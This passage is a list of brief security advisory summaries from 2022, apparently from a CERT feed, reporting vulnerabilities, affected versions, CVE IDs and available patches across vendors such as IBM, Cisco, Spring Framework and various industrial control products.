WordPress' RSVPMaker Plugin. The affected versions are WP RSVPMaker Plugin versions up to
and including 9.2.5. CVE ID: CVE-2022-1453 (Critical)
Mitsubishi Electric has released security updates to resolve Denial-of-Service (DoS)
vulnerability for some MELSEC series and MELIPC series products. CVE ID: CVE-2021-20609 (High), CVE-2021-20610 (High), CVE-2021-20611 (High)
A Remote Code Execution (RCE) vulnerability has been discovered in Apache CouchDB prior to
3.2.2 that can cause access to an improperly secured default installation without
authentication and can gain admin privileges. CVE ID: CVE-2022-24706 (Critical)
An authentication bypass vulnerability has been discovered in ThinVNC version 1.0b1 that can
cause code execution on the server by sending keyboard or mouse events to the server. CVE ID: CVE-2022-25226 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-24765 (High), CVE-2022-23451, CVE-2022-23452
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in Netatalk versions prior to Netatalk 3.1.13.
These vulnerabilities affect the QNAP operating system. CVE ID: CVE-2021-31439 (High), CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124,CVE-2022-23125, CVE-2022-0194
SUSE has released security updates to resolve multiple vulnerabilities in Linux
Kernel. CVE ID: CVE-2022-1011 (High), CVE-2022-1016, CVE-2021-39713 (Critical), CVE-2022-0886
Wordfence has released security updates to resolve an Information Disclosure vulnerability
in WordPress' Metform Elementor Contact Form Builder Plugin. The affected versions are WP
Metform Elementor Contact Form Builder Plugin versions up to and including 2.1.3. CVE ID: CVE-2022-1442 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that ASUS RT-AX88U has a Format String vulnerability, which allows an
unauthenticated remote attacker to write to arbitrary memory address and perform remote
arbitrary code execution, arbitrary system operation or disrupt service. CVE ID: CVE-2022-26674 (Critical)
It has been discovered that Spring Security OAuth versions 2.5.x prior to 2.5.2 and older
unsupported versions are susceptible to a Denial-of-Service (DoS) attack via the initiation
of the Authorization Request in an OAuth 2.0 Client application. Users of affected versions
are recommended to upgrade to Spring Security OAuth above version 2.5.2. CVE ID: CVE-2022-22969 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Delta Electronics has released security update to address Out-of-bounds Write, and
Out-of-bounds Read vulnerabilities in Delta Electronics' equipment- ASDA-Soft. Successful
exploitation of these vulnerabilities can allow arbitrary code execution. CVE ID: CVE-2022-1402 (High), CVE-2022-1403 (High)
Johnson Controls has released security update to address Server-side Request Forgery
vulnerability that impacts Metasys System Configuration Tool (SCT) and System Configuration
Tool Pro (SCT Pro). A remote unauthenticated attacker can identify and forge requests to
internal systems via a specially crafted request allowing the attacker to determine if
specific files or paths exist. CVE ID: CVE‐2021‐36203 (Medium)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-43975 (Medium), CVE-2022-0617 (Medium), CVE-2022-24448 (Low),
CVE-2022-24959 (Medium)
Google has released updated Chrome Dev 102 (102.0.5005.9) for Android, Dev channel
102.0.5005.6 (Platform version: 14695.11.0) for most ChromeOS devices, Beta channel
101.0.4951.41 (Platform version: 14588.67.0) for most ChromeOS devices, Dev channel
102.0.5005.12 for Linux, Mac and 102.0.5005.12/13 for Windows.
Memcached poisoning with unauthenticated request vulnerability has been discovered in Zimbra
Collaboration (aka ZCS) 8.8.15 and 9.0. It allows an unauthenticated attacker to inject
arbitrary memcache commands into a targeted instance. These memcache commands become
unescaped, causing an overwrite of arbitrary cached entries. CVE ID: CVE-2022-27924 (High)
Jira has released security update to address an authentication bypass vulnerability in Jira
and Jira Service Management's web authentication framework. A remote, unauthenticated
attacker can exploit this vulnerabiltiy by sending a specially crafted HTTP request to
bypass authentication and authorization requirements in WebWork actions using an affected
configuration. CVE ID: CVE-2022-0540 (Critical)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20732 (High), CVE-2022-20773 (High), CVE-2022-20783 (High),
CVE-2022-20778 (Medium), CVE-2022-20795 (Medium), CVE-2022-20805 (Medium), CVE-2022-20790
(Medium), CVE-2022-20804 (Medium), CVE-2022-20787 (Medium), CVE-2022-20786 (Medium),
CVE-2022-20788 (Medium), CVE-2022-20789 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Drupal has released security update to address an access bypass vulnerability in Drupal
core. This vulnerability only affects sites using Drupal's revision system.
Google has released updated Chrome Beta 101 (101.0.4951.41) for Android, Chrome Beta 102
(102.0.5005.7) for iOS, and Beta channel 101.0.4951.41 for Windows, Mac and Linux.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Apache HTTP Server that affects QNAP NAS.
CVE ID: CVE-2022-22721 (Critical), CVE-2022-23943 (Critical)
A data validation vulnerability has been discovered in Mitel Service Appliance component of
MiVoice Connect, which can allow a malicious actor to perform Remote Code Execution (RCE)
within the context of the Service Appliance. The remediation is available. CVE ID: CVE-2022-29499 (Critical)
Lenovo has released security updates to address multiple BIOS vulnerabilities in Lenovo
Notebook that can lead to Privilege escalation vulnerability. CVE ID: CVE-2021-3970, CVE-2021-3971, CVE-2021-3972
Interlogix has released security update to address Improper Restriction of Excessive
Authentication Attempts, and Inadequate Encryption Strength vulnerabilities in Interlogix's
equipment- Hills ComNav. Successful exploitation of these vulnerabilities can allow an
attacker to log in to modify the system. CVE ID: CVE-2022-26519 (Medium), CVE-2022-1318 (Medium)
Automated Logic has released security update to address an Open Redirect vulnerability in
Automated Logic's equipment- WebCtrl Server. Successful exploitation of this vulnerability
can allow an attacker to redirect the user to a malicious webpage or to download a malicious
file. CVE ID: CVE-2022-1019 (Medium)
Cisco has released security update to address a vulnerability in the implementation of the
Border Gateway Protocol (BGP) Ethernet VPN (EVPN) functionality in Cisco IOS XR Software.
This vulnerability can allow an unauthenticated, remote attacker to cause a denial of
service (DoS) condition. CVE ID: CVE-2022-20758 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Dell has released security update to resolve a covert timing channel vulnerability in Dell
BSAFE SSL-J that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-24409 (Medium)
Oracle has released its critical patch update for April 2022 to address 520 vulnerabilities
across multiple products. A remote attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-21445 (Critical), CVE-2022-21431 (Critical), CVE-2022-21420
(Critical), CVE-2022-23305 (Critical), CVE-2018-1285 (Critical), CVE-2021-40438 (Critical),
CVE-2022-22965 (Critical), CVE-2021-39275 (Critical), CVE-2021-3711 (Critical)
Elcomplus has released security update to address Path Traversal, Unrestricted Upload of
File with Dangerous Type, Improper Authorization, and Cross-site Scripting vulnerabilities
in Elcomplus's equipment- SmartPPT. An attacker can exploit these vulnerabilities to take
control of an affected device. CVE ID: CVE-2021-43932 (Critical), CVE-2021-43939 (High), CVE-2021-43934 (Critical),
CVE-2021-43930 (Medium)
Elcomplus has released security update to address Cross-site Scripting, Unauthorized
Exposure to Sensitive Information, Unrestricted Upload of File with Dangerous Type, Path
Traversal, and Cross-site Request Forgery vulnerabilities in Elcomplus's equipment- SmartPPT
SCADA Server. An attacker can exploit these vulnerabilities to take control of an affected
device. CVE ID: CVE-2021-43932 (Critical), CVE-2021-43938 (High), CVE-2021-43934 (Critical),
CVE-2021-43930 (Critical), CVE-2021-43937 (High)
An integer overflow or wraparound vulnerability has been discovered in in multiple Real-Time
Operating Systems (RTOS) and supporting libraries. Successful exploitation of these
vulnerabilities can result in unexpected behavior such as a crash or a Remote Code Execution
(RCE)/injection. The security update are available for some products. CVE ID: CVE-2021-3420 (Critical), CVE-2021-22156 (Critical)
It has been discovered that Siemens products are affected by Spring Framework vulnerability.
Security updates are available for some products. CVE ID: CVE-2022-22965 (Critical)
Hitachi Energy has released security update to address a vulnerability in the HCI Modbus TCP
function of the RTU500 series providing support for Modbus TCP slave functionality. An
attacker can exploit this vulnerability only on RTU500 series in which HCI Modbus TCP is
configured and enabled by project configuration. CVE ID: CVE-2022-28613 (High)
Ubuntu has released security updates to address several vulnerabilities in klibc. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-31870 (Critical), CVE-2021-31872 (Critical), CVE-2021-31873
(Critical), CVE-2021-31871 (High)
Dell has released security update to resolve SharpZipLib vulnerability in Dell EMC Log
Scrubber that can be exploited by malicious users to compromise the affected system. CVE ID: CVE-2021-32840 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security update to resolve buffer overflow vulnerability in IPsec ESP
transformation code in Linux Kernel. CVE ID: CVE-2022-27666 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Google has released security update for LTS channel 96.0.4664.206 (Platform Version:
14268.81.0) for most ChromeOS devices. CVE ID: CVE-2022-1131 (High), CVE-2022-1141 (Medium), CVE-2022-1142 (Medium),
CVE-2022-1145 (Medium), CVE-2022-1143 (Medium), CVE-2022-1144 (Medium)
An Incomplete Cleanup vulnerability has been discovered in Johnson Controls' equipment-
Metasys ADS/ADX/OAS Servers. Successful exploitation of this vulnerability can allow a
remote attacker to use a session token that has not been cleared upon log out of an
authenticated user. The mitigations are available. CVE ID: CVE-2021-36205 (High)
Delta Electronics has released security update to address an Improper Restriction of XML
External Entity Reference vulnerability discovered in Delta Electronics' equipment- DMARS, a
Motion Controller program development tool. Successful exploitation of this vulnerability
can allow an attacker to gain sensitive information. CVE ID: CVE-2022-1331 (Medium)
An information exposure vulnerability has been discovered in the Palo Alto Networks Cortex
XDR agent that enables a local user to learn the cryptographic hash of the supervisor
password when generating support files on a deployed agent. The Palo Alto Networks has also
identified a technique that enables a local administrator to tamper with the Windows
registry to disable the Cortex XDR agent on devices running a Windows operating system.
Wordfence has released security updates to resolve a Cross-Site Request Forgery
vulnerability in WordPress' Fancy Product Designer Plugin. The affected versions are WP
Fancy Product Designer Plugin versions up to and including 4.7.5. CVE ID: CVE-2021-4096 (High)
Schneider Electric has released a security bulletin that includes a range of technical
analytics, hunting tools, and specific mitigations to help asset owners find and defend
against the framework. The mitigations are available.
CODESYS has released a advisory for all CODESYS V3 products that can be targeted and have a
communication server for the CODESYS protocol or for OPC UA. The mitigations are available.
VMware has released security updates and workarounds to resolve a remote code execution
vulnerability in VMware Cloud Director. CVE ID: CVE-2022-22966 (Critical)
Multiple vulnerabilities have been discovered in Red Lion's equipment- DA50N. Successful
exploitation of these vulnerabilities can result in data compromise, data modification, and
a denial-of-service condition. Red Lion notes the DA50N series product is at end-of-life and
does not intend to release a software update to address these vulnerabilities. Users are
encouraged to apply workarounds and mitigations or upgrade their device to DA50A and DA70A.
CVE ID: CVE-2022-26516 (High), CVE-2022-1039 (Critical), CVE-2022-27179 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Juniper Networks has released security update to address multiple vulnerabilities in Junos
OS Evolved. These vulnerabilities affects all versions of Junos OS Evolved. CVE ID: CVE-2022-22195 (High)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
Valmet has released security update to address an Inadequate Encryption Strength
vulnerability in Valmet's equipment- DNA, a distributed control system. Successful
exploitation of this vulnerability can allow an attacker to execute commands remotely with
system privileges. CVE ID: CVE-2021-26726 (High)
Inductive Automation has released security update to address Path Traversal vulnerability in
Inductive Automation's equipment- Ignition. Successful exploitation of this vulnerability
can allow an authenticated attacker with network access to execute code by uploading a
malicious zip file. CVE ID: CVE-2022-1264 (Medium)
Citrix has released security updates to address vulnerabilities in multiple products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-27505, CVE-2022-27506, CVE-2022-27503, CVE-2021-44519,
CVE-2021-44520, CVE-2022-26151, CVE-2022-21827
Microsoft has released security updates to address a critical remote code execution
vulnerability in Remote Procedure Call Runtime Library. A remote, unauthenticated attacker
can exploit this vulnerability to take control of an affected system. CVE ID:CVE-2022-26809 (Critical)
Microsoft has released security updates to address Remote Code Execution vulnerability in
Windows Network File System. An attacker can send a specially crafted NFS protocol network
message to a vulnerable Windows machine, which can enable remote code execution. This CVE ID
is unique from CVE-2022-24497. CVE ID:CVE-2022-24491 (Critical)
Aethon has released security update to address Missing Authorization, Channel Accessible by
Non-endpoint, Cross-site Scripting vulnerabilities in Aethon's equipment- TUG Home Base
Server. Successful exploitation of these vulnerabilities can cause a denial-of-service
condition, allow full control of robot functions, or expose sensitive information. CVE ID:CVE-2022-1066 (High), CVE-2022-26423 (High), CVE-2022-1070 (Critical),
CVE-2022-27494 (High), CVE-2022-1059 (High)
Schneider Electric's has released security updates and mitigations to resolve multiple
vulnerabilities in its products. CVE ID:CVE-2022-24324 (Critical)
Apache has released security updates to resolve Remote Code Execution (RCE) vulnerability in
Struts versions 2.0.0 - 2.5.29. An attacker can exploit this vulnerability to take control
of an affected system. CVE ID:CVE-2021-31805
Adobe has released security updates to address several vulnerabilities in multiple products
. Successful exploitation of these vulnerabilities can lead to arbitrary code execution,
memory leaks, security feature bypass and privilege escalation.
Multiple vulnerabilities have been discovered in several Jenkins Plugin. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Zyxel has released a security update to address a local privilege escalation vulnerability
in its AP Configurator. CVE ID:CVE-2022-26413 (High), CVE-2022-26414 (Medium), CVE-2022-0556 (High)
HP has released security updates to resolve multiple vulnerabilities in several products.
The affected products are PCoIP Client, PCoIP Client SDK & PCoIP Graphics Agent of
Windows, Linux & macOS.
Google has released updated Chrome 100 (100.0.4896.85) for iOS, Stable channel 100.0.4896.88
for Windows, Mac and Linux and Chrome 100 (100.0.4896.88) for Android.
CISA has added 8 known actively exploited vulnerabilities in Firebox & XTM, Microsoft
Active Directory, Google Pixel, Checkbox Survey, Linux Kernel, QNAP Network-Attached Storage
and User Interface (UI) for ASP.NET AJAX into its Catalog. CVE ID:CVE-2022-23176(High), CVE-2021-42287(High), CVE-2021-42278(High),
CVE-2021-39793(High), CVE-2021-27852(Critical), CVE-2021-22600 (High), CVE-2020-2509
(Critical), CVE-2017-11317 (Critical)
Debian has released security update to resolve multiple vulnerabilities in Thunderbird which
can cause Denial of Service (DoS) or the execution of arbitrary code. CVE ID:CVE-2022-1097, CVE-2022-1196, CVE-2022-1197, CVE-2022-24713, CVE-2022-28281,
CVE-2022-28282, CVE-2022-28285, CVE-2022-28286, CVE-2022-28289
Dell has released security update to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system.
A vulnerability has been discovered in ABB Arctic Wireless Gateways. An attacker can exploit
the vulnerability by remotely connecting to the serial port gateway, and/or protocol
converter, depending on the configuration. Mitigation is available. CVE ID:CVE-2022-0947
Zyxel has released security updates to resolve OS command injection and buffer overflow
vulnerabilities in several models of DSL/Ethernet CPE & Fiber ONT. CVE ID:CVE-2022-26413, CVE-2022-26414
Multiple vulnerabiliies have been discovered in FANUC Corporation's equipment- ROBOGUIDE.
Successful exploitation of these vulnerabilities can lead to data corruption in users PC.
CVE ID:CVE-2021-38483, CVE-2021-43986, CVE-2019-43988, CVE-2019-43990, CVE-2019-43933
ASEA Brown Boveri (ABB) has released security update to address Incomplete Internal State
Distinction, Improper Handling of Unexpected Data Type, and Uncontrolled Resource
Consumption vulnerabilities in ABB's equipment Symphony Plus SPIET800 and PNI800. Successful
exploitation of these vulnerabilities can cause the affected device to become unresponsive,
resulting in a denial-of-service condition and requiring manual reboot. CVE ID:CVE-2021-22285 (High), CVE-2021-22286 (High), CVE-2021-22288 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Palo Alto Networks has released security update to address an OpenSSL infinite loop
vulnerability in its multiple products that can result in a Denial-of-Service (DoS) to the
application.
Google has released updated Beta channel 101.0.4951.26 (Platform version: 14588.41.0) for
most Chrome OS devices, Dev channel 102.0.4987.0 for Windows, Linux and Mac, Chrome Beta 101
(101.0.4951.26) for iOS, and Chrome Dev 102 (102.0.4989.0) for Android.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released a security update to address Denial of Service (DoS) and
malicious code execution vulnerability due to heap-based buffer overflow in the DHCP client
function of VxWorks on the MELSEC-Q Series C Controller Module. The affected product is
VxWorks version 6.4. CVE ID:CVE-2021-29998 (Critical)
Red Hat has released a product enhancement advisory for Red Hat Advanced Cluster Security
for Kubernetes (RHACS) which includes bug fixes and feature improvements.
Huawei has released security update to address an improper authentication vulnerability in
some Huawei products. Successful exploitation of this vulnerability can lead to control of
the victim device. CVE ID: CVE-2022-22259 (High)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID:CVE-2022-20781 (Medium), CVE-2022-20763 (Medium), CVE-2022-20774 (Medium),
CVE-2022-20784 (Medium), CVE-2022-20741 (Medium), CVE-2022-20782 (Medium), CVE-2022-20675
(Medium)
Ubuntu has released security updates to address several vulnerabilities in Linux Kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released updated Chrome Beta 101 (101.0.4951.26) for Android, LTS-96
96.0.4664.204 (Platform Version: 14268.79.0) for most ChromeOS devices and Beta channel
101.0.4951.26 for Windows, Mac and Linux. CVE ID:CVE-2022-0977 (High), CVE-2022-0974 (High), CVE-2022-0972 (High)
CODESYS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID:CVE-2022-22519 (High), CVE-2022-22513 (High), CVE-2022-22514 (High),
CVE-2022-22518 (Medium), CVE-2022-22517 (High), CVE-2022-22516 (High), CVE-2022-22515 (High)
It has been discovered that Apache Lucene used in IBM products are vulnerable to a Denial of
Service (DoS) attack by sending a specific regular expression query. The affected products
are IBM Business Automation Workflow V21.0, V20.0, V19.0 & V18.0 and IBM Business
Process Manager V8.6 & V8.5. The remediation/ fixes are available.
Cisco has released security updates to address Remote Code Execution (RCE) vulnerabilities
in Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+
and Spring Cloud Function Framework. These RCE vulnerabilities are affecting several Cisco
products. CVE ID:CVE-2022-22965 (Critical), CVE-2022-22963 (Critical)
Microsoft has released security updates to address Remote Code Execution vulnerability in
Windows Network File System. An attacker can send a specially crafted NFS protocol network
message to a vulnerable Windows machine, which can enable remote code execution. CVE ID:CVE-2022-24497 (Critical)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.8. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID:CVE-2022-1097 (High), CVE-2022-28281 (High), CVE-2022-1197 (Medium),
CVE-2022-1196 (Medium), CVE-2022-28282 (Medium), CVE-2022-28285 (Medium), CVE-2022-28286
(Medium), CVE-2022-28289 (High), CVE-2022-24713 (Low)
Patient Portal has released security update to address authentication bypass using alternate
path or channel vulnerability in Patient Portal's LifePoint Informatics equipment.
Successful exploitation of this vulnerability can disclose sensitive information, including
HIPAA-protected PII. CVE ID:CVE-2022-1067 (Medium)
Rockwell Automation has released security update to address deserialization of untrusted
data vulnerability in Rockwell Automation's ISaGRAF equipment. Successful exploitation of
this vulnerability can allow arbitrary code execution. CVE ID:CVE-2022-1118 (High)
Citrix Hypervisor has released security updates to address a vulnerability in Citrix
Hypervisor and Citrix XenServer that allow privileged code in a guest VM to cause the host
to crash or become unresponsive. CVE ID:CVE-2022-26357
Mozilla has released security updates to address multiple vulnerabilities in Firefox and
Firefox ESR. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available. CVE ID:CVE-2022-22410 (Low), CVE-2018-25031 (Medium), CVE-2021-46708 (Medium),
CVE-2021-38966 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID:CVE-2021-42392 (Critical), CVE-2022-23221 (Critical), CVE-2022-24761 (High)
Dell has released security update to address plain-text password storage vulnerability in
Dell EMC Repository Manager version 3.4.0. CVE ID: CVE-2022-26856 (High)
Google has released updated Chrome Beta channel 101.0.4951.19 (Platform version: 14588.31.0)
for most Chrome OS devices, Stable channel 100.0.4896.75 for Windows, Mac and Linux,
Extended Stable 100.0.4896.75 for Windows and Mac, and Chrome 100 (100.0.4896.77) for iOS.
Google has also released security update to resolve Type Confusion vulnerability in Stable
channel. CVE ID: CVE-2022-1232 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities in Spring Framework and Denial of Service (DoS) vulnerability in
Linux Kernel are affecting several NetApp products. An attacker can exploit these
vulnerabilities to take control of an affected system. Updates are available for Linux
Kernel. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22950 (Medium), CVE-2022-0516 (High)
Remote Code Execution (RCE) vulnerability in the Spring Framework has affected TP-Links'
DPMS (DeltaStream PON Management System). The mitigation is available. CVE ID: CVE-2022-22965
VMware has released security updates and workarounds to resolve critical Remote Code
Execution (RCE) vulnerability in Spring Framework Project. CVE ID: CVE-2022-22965 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux Kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Debian has released security update to resolve Denial of Service (DoS) or execution of
arbitrary code vulnerability in zlib. CVE ID: CVE-2018-25032 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-25299 (High)
HP has released security updates for Teradici PCoIP Graphics Agent for Windows, Linux &
macOS and Teradici PCoIP Standard Agent for Windows & Linux. The affected products are
Mongoose web server prior to version 7.6. CVE ID: CVE-2022-25299 (High)
Multiple vulnerabilities such as Remote Code Execution (RCE) and Denial of Service (DoS)
vulnerabilities have been discovered in multiple Fortinet products. Security updates are
available for some products. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22963 (High), CVE-2022-0778 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Updates are available
for some products. CVE ID: CVE-2022-0543 (Critical), CVE-2022-22950 (Medium), CVE-2022-0516 (High),
CVE-2022-23308 (High), CVE-2022-23710 (Medium)
Remote Code Execution vulnerabilities in Spring Framework / Spring Cloud Function are
affecting Nutanix products. The updates are available. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22963 (Medium)
A code injection vulnerability has been discovered in Rockwell Automation's equipment,
Studio 5000 Logix Designer, that may allow an attacker to download a modified program to the
controller. CVE ID: CVE-2022-1159 (High)
Fuji Electric has released a security update to address multiple vulnerabilities in its
equipment, Alpha5 that can allow an attacker to disclose sensitive information and execute
arbitrary code. The affected products are Alpha5, all versions prior to 4.3. CVE ID: CVE-2022-21168 (Low), CVE-2022-21202 (Low), CVE-2022-24383 (High),
CVE-2022-21228 (High), CVE-2022-21214 (High)
Wordfence has released security updates to resolve a reflected Cross-Site Scripting (XSS)
vulnerability in WordPress' WP YouTube Live Plugin. The affected versions are WP YouTube
Live Plugin versions up to and including 1.7.21. CVE ID: CVE-2022-1187 (Medium)
Dell has released a security update to address an improper SMM communication buffer
verification vulnerability in Dell PowerEdge products, which can cause arbitrary writes or
Denial of Service (DoS). CVE ID: CVE-2022-22558 (Medium)
Google has released updated Chrome Beta 101 (101.0.4951.15) for Android, Dev channel
102.0.4972.0 for Windows, Linux and Mac, Chrome 101.0.4951.15 Beta channel for Windows, Mac
and Linux and Chrome Beta 101 (101.0.4951.17) for iOS.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An inclusion of functionality from untrusted control sphere vulnerability has been
discovered in Rockwell Automation's equipment Logix Controllers which can allow an attacker
to modify user programs. The mitigations are available. CVE ID: CVE-2022-1161 (Critical)
General Electric Renewable Energy has released security updates to address multiple
vulnerabilities in it's equipments MDS iNET/iNET II/SD/TD220/TD220MAX Radios. Successful
exploitation of these vulnerabilities can allow an attacker to control the configuration of
the radio, join the network without proper authorisation or keep valid users from using the
system correctly. CVE ID: CVE-2017-17562 (Critical), CVE-2022-24119 (Critical), CVE-2022-24116 (High),
CVE-2022-24118 (Medium), CVE-2022-24120 (Medium), CVE-2022-24117 (High)
An OpenSSL infinite loop vulnerability has been discovered in Palo Alto Networks multiple
products that can result in a Denial-of-Service (DoS) to the application. CVE ID: CVE-2022-0778 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities such as authentication bypass, information disclosure and
information tampering have been discovered in Mitsubishi Electric FA Products. Successful
exploitation of these vulnerabilities can cause login to the products or the information in
the products may be disclosed or tampered with. CVE ID: CVE-2022-25155 (Medium), CVE-2022-25156 (Medium), CVE2022-25157 (High),
CVE-2022-25158 (High), CVE-2022-25159 (Medium), CVE-2022-25160 (Medium)
A zero day Remote Code Execution (RCE) vulnerability has been discovered in JAVA libraries
two vectors SpringCore & Spring Cloud Function. CVE ID: CVE-2022-22963
Wordfence has released security updates to resolve an information disclosure vulnerability
in Be POPIA Compliant WordPress plugin. The affected versions are Be POPIA Compliant
versions up to and including 1.1.5. CVE ID: CVE-2022-1186 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in several products.
An attacker can exploit some of these vulnerabilities to take control of an affected system.
Dell has released security update to address multiple vulnerabilities Dell EMC NetWorker
Runtime Environment (NRE) and Dell EMC PowerProtect Data Manager..
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A missing authentication for critical function vulnerability has been discovered in Philips'
equipment e-Alert which allows an unauthorised actor to remotely shutdown the system, if
healthcare facilities are on the network. The affected products are e-Alert version 2.7 and
prior. CVE ID: CVE-2022-0922 (Medium)
An improper restriction of XML external entity reference vulnerability has been discovered
in Rockwell Automation's equipment ISaGRAF which can allow an attacker to pass local file
data to a remote web server, leading to loss of confidentiality. The updates and mitigations
are available. CVE ID: CVE-2022-1018 (Medium)
Multiple vulnerabilities have been discovered in Omron's equipment CX-Position. Successful
exploitation of these vulnerabilities when parsing an NCI file can allow code execution. The
affected products are CX-Position versions 2.5.3 and prior. CVE ID: CVE-2022-26419 (High), CVE-2022-25959 (High), CVE-2022-26417 (High),
CVE-2022-26022 (High)
Modbus Tools has released security update to resolve stack-based buffer overflow
vulnerability in its equipment Modbus Slave. Successful exploitation of vulnerability can
crash the application when inputting a registration key. The affected products are Modbus
Slave versions 7.4.2 and prior. CVE ID: CVE-2022-1068 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugin. An attacker can
exploit these vulnerabilities to take control of an affected system.
An information disclosure vulnerability has been discovered in VMware vCenter Server &
Cloud Foundation. The security updates are available. CVE ID: CVE-2022-22948 (Medium)
ASUS has released software update to resolve multiple vulnerabilities in the ASUS Control
Center, an integrated management software. CVE ID: CVE-2022-26668, CVE-2022-26669
Google has released security update for Dev channel 101.0.4951.13 (Platform version:
14588.23.0) for most Chrome OS devices, Chrome 100 (100.0.4896.58) for Android, Stable
channel Chrome 100.0.4896.60 for Windows, Mac and Linux, Dev channel 101.0.4951.15 for
Windows, Linux and Mac, and Chrome 100 (100.0.4896.56) for iOS.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Mitsubishi Electric has released security updates & mitigations to resolve Denial of
Service (DoS) and Log4j vulnerabilities in MELSEC iQ-R, Q and L series CPU modules and
SW1DNN-GN610SRC-M all versions prior to Ver.1.02C respectively. CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical), CVE-2021-45105
(Medium), CVE-2020-5652 (High)
Wordfence has released security updates to resolve Arbitrary File Download vulnerability in
Simple File List WordPress plugin. The affected versions are Simple File List versions up to
and including 3.2.7. The updated version 3.2.8 is available. CVE ID: CVE-2022-1119 (High)
Siemens has released work around & mitigation to resolve SegmentSmack vulnerability in
Interniche IP-Stack based Industrial devices, SIMATIC S7-300 and S7-400 which can lead to a
Denial-of-Service. CVE ID: CVE-2019-19300 (High)
Google has released updated Stable channel 99.0.4844.94 (Platform version: 14469.59.0) for
most Chrome OS devices, and Beta channel 100.0.4896.60 for Mac, Windows and Linux.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released security update for NVIDIA CUDA Toolkit SDK to resolve an integer
overflow vulnerability which may lead to code execution, Denial of Service (Dos), or
information disclosure. CVE ID: CVE‑2022‑21821 (High)
Dell has released security update to address privilege escalation vulnerability in Dell
Command | Update, Dell Update, and Alienware Update versions before 4.5. CVE ID: CVE-2022-24426 (High)
It has been discovered that unauthorized users have accessed Moxa’s products by using the
default password. Moxa reminds all users to change all default passwords immediately to
enhance the security of their devices.
Google has released security update for Chrome 99 (99.0.4844.88) for Android, Extended
Stable channel 98.0.4758.141 for Windows and Mac, Stable channel 99.0.4844.84 for Windows,
Mac and Linux, and Chrome Beta 101 (101.0.4951.8) for iOS. CVE ID: CVE-2022-1096 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
